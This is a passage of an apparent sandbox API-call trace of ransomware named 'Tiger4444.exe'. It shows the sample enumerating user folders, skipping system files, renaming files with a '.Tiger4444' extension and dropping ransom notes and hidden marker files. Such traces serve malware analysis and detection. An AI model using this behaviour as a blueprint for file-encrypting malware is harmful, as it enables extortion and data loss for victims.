(lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="Tiger4444.exe") returned -1 [0052.406] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2=".") returned 1 [0052.406] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="..") returned 1 [0052.406] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="windows") returned -1 [0052.406] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="bootmgr") returned 1 [0052.406] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="pagefile.sys") returned -1 [0052.406] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="boot") returned 1 [0052.406] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="ids.txt") returned -1 [0052.406] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="NTUSER.DAT") returned -1 [0052.406] lstrcpyW (in: lpString1=0x30aeb68, lpString2="ddbd6a25-732f-4175-9949-5cdf51e0bd09" | out: lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09") returned="ddbd6a25-732f-4175-9949-5cdf51e0bd09" [0052.406] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09", dwFileAttributes=0x22) returned 1 [0052.407] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09", dwFileAttributes=0x6) returned 1 [0052.407] lstrlenW (lpString="ddbd6a25-732f-4175-9949-5cdf51e0bd09") returned 36 [0052.407] lstrlenW (lpString="Tiger4444") returned 9 [0052.407] lstrcmpiW (lpString1="f51e0bd09", lpString2="Tiger4444") returned -1 [0052.407] lstrlenW (lpString=".dll") returned 4 [0052.407] lstrcmpiW (lpString1="bd09", lpString2=".dll") returned 1 [0052.407] lstrlenW (lpString=".lnk") returned 4 [0052.407] lstrcmpiW (lpString1="bd09", lpString2=".lnk") returned 1 [0052.407] lstrlenW (lpString=".ini") returned 4 [0052.407] lstrcmpiW (lpString1="bd09", lpString2=".ini") returned 1 [0052.407] lstrlenW (lpString=".sys") returned 4 [0052.407] lstrcmpiW (lpString1="bd09", lpString2=".sys") returned 1 [0052.407] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.407] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.407] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14386041979) returned 1 [0052.407] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=468) returned 1 [0052.407] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0052.407] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0052.407] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x2a4 [0052.409] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0xbe0000 [0052.410] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.410] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0052.410] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.410] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0052.410] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.410] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0052.410] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.410] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0052.410] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14386330360) returned 1 [0052.410] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0052.410] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0052.410] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.410] CloseHandle (hObject=0x2a4) returned 1 [0052.410] CloseHandle (hObject=0x2c8) returned 1 [0052.410] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09.Tiger4444") returned 142 [0052.411] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09.tiger4444"), dwFlags=0x1) returned 1 [0052.411] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3a637b3f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a637b3f, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x5c178632, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0052.411] lstrcmpiW (lpString1="Preferred", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.411] lstrcmpiW (lpString1="Preferred", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.411] lstrcmpiW (lpString1="Preferred", lpString2="Tiger4444.exe") returned -1 [0052.411] lstrcmpiW (lpString1="Preferred", lpString2=".") returned 1 [0052.411] lstrcmpiW (lpString1="Preferred", lpString2="..") returned 1 [0052.411] lstrcmpiW (lpString1="Preferred", lpString2="windows") returned -1 [0052.411] lstrcmpiW (lpString1="Preferred", lpString2="bootmgr") returned 1 [0052.411] lstrcmpiW (lpString1="Preferred", lpString2="pagefile.sys") returned 1 [0052.411] lstrcmpiW (lpString1="Preferred", lpString2="boot") returned 1 [0052.411] lstrcmpiW (lpString1="Preferred", lpString2="ids.txt") returned 1 [0052.411] lstrcmpiW (lpString1="Preferred", lpString2="NTUSER.DAT") returned 1 [0052.411] lstrcpyW (in: lpString1=0x30aeb68, lpString2="Preferred" | out: lpString1="Preferred") returned="Preferred" [0052.411] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\Preferred", dwFileAttributes=0x22) returned 1 [0052.412] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\Preferred", dwFileAttributes=0x6) returned 1 [0052.412] lstrlenW (lpString="Preferred") returned 9 [0052.412] lstrlenW (lpString="Tiger4444") returned 9 [0052.412] lstrcmpiW (lpString1="Preferred", lpString2="Tiger4444") returned -1 [0052.412] lstrlenW (lpString=".dll") returned 4 [0052.412] lstrcmpiW (lpString1="rred", lpString2=".dll") returned 1 [0052.412] lstrlenW (lpString=".lnk") returned 4 [0052.412] lstrcmpiW (lpString1="rred", lpString2=".lnk") returned 1 [0052.412] lstrlenW (lpString=".ini") returned 4 [0052.412] lstrcmpiW (lpString1="rred", lpString2=".ini") returned 1 [0052.412] lstrlenW (lpString=".sys") returned 4 [0052.412] lstrcmpiW (lpString1="rred", lpString2=".sys") returned 1 [0052.412] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\Preferred" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\preferred"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.413] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.413] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14386578524) returned 1 [0052.413] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=24) returned 1 [0052.413] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0052.413] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0052.413] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x2a4 [0052.414] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0xbe0000 [0052.415] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.415] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0052.415] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.415] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0052.415] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.416] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0052.416] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.416] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0052.416] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14386874339) returned 1 [0052.416] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0052.416] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0052.416] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.416] CloseHandle (hObject=0x2a4) returned 1 [0052.416] CloseHandle (hObject=0x2c8) returned 1 [0052.416] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\Preferred.Tiger4444") returned 115 [0052.416] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\Preferred" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\preferred"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\Preferred.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\preferred.tiger4444"), dwFlags=0x1) returned 1 [0052.417] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3a637b3f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a637b3f, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x5c178632, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0052.417] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0052.417] lstrcpyW (in: lpString1=0x30aeb68, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.417] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.417] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.417] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.418] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.418] CloseHandle (hObject=0x2c8) returned 1 [0052.418] CloseHandle (hObject=0x2ac) returned 1 [0052.418] GetCurrentThreadId () returned 0xfa8 [0052.418] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc915b0 [0052.418] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof" [0052.418] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73fc0 | out: hHeap=0xc50000) returned 1 [0052.418] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc915a8 | out: hHeap=0xc50000) returned 1 [0052.418] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof" [0052.418] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\" [0052.418] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\.BFC0E91B00AE8A0620D3" [0052.418] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\proof\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.428] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.431] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.432] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.432] CloseHandle (hObject=0x2ac) returned 1 [0052.433] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof") returned 47 [0052.433] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.433] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f58c1c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x6f58c1c, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x84438401, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e48 [0052.433] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.433] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.433] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.433] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.433] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f58c1c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x6f58c1c, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x84438401, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.433] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.433] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.433] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.433] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.433] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.433] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x84438401, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x84438401, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8445e514, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.433] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.433] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.433] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x84438401, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x84438401, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8445e514, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.433] FindClose (in: hFindFile=0xc72e48 | out: hFindFile=0xc72e48) returned 1 [0052.433] lstrcpyW (in: lpString1=0x30aeb08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.433] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Proof\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\proof\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0052.434] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0052.434] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0052.434] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.434] CloseHandle (hObject=0x2c8) returned 1 [0052.434] CloseHandle (hObject=0x2ac) returned 1 [0052.434] GetCurrentThreadId () returned 0xfa8 [0052.434] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc91390 [0052.434] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint" [0052.434] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0052.434] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc91388 | out: hHeap=0xc50000) returned 1 [0052.434] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint" [0052.435] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\" [0052.435] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\.BFC0E91B00AE8A0620D3" [0052.435] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\powerpoint\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0052.436] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0052.438] FlushFileBuffers (hFile=0x2ac) returned 1 [0052.439] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.439] CloseHandle (hObject=0x2ac) returned 1 [0052.440] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint") returned 52 [0052.440] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.440] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b00229f, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x1b00229f, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x8445e514, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0052.440] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.440] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.440] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0052.440] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.440] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b00229f, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x1b00229f, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x8445e514, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.440] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.440] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.440] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0052.440] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.440] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.440] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8445e514, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8445e514, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8445e514, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, 